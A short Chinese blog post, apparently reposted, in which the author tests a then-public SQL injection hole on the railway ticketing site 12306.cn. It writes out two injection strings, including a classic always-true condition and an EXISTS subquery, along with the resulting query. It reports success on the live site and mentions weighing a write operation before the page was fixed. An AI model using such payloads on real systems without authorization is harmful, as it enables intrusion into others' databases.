12306.cn的SQL注入漏洞实测

那会儿(8月27日)微博上疯传一张12306.cn的SQL注入漏洞截图:

12306.cn的SQL注入漏洞实测


以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。

根据trace提示简单构造一个:

' OR '1'='1' OR ZIZ='

注入后的效果应就是:

select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm

12306.cn的SQL注入漏洞实测


果了个然~!成功鸟~!

同理再构造个子查询:

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR  ZIZ='

12306.cn的SQL注入漏洞实测

没报错,又成功鸟~!

当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:

12306.cn的SQL注入漏洞实测


晚上回家后发现该漏洞已经修复鸟~~~~~~

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyxdzd.html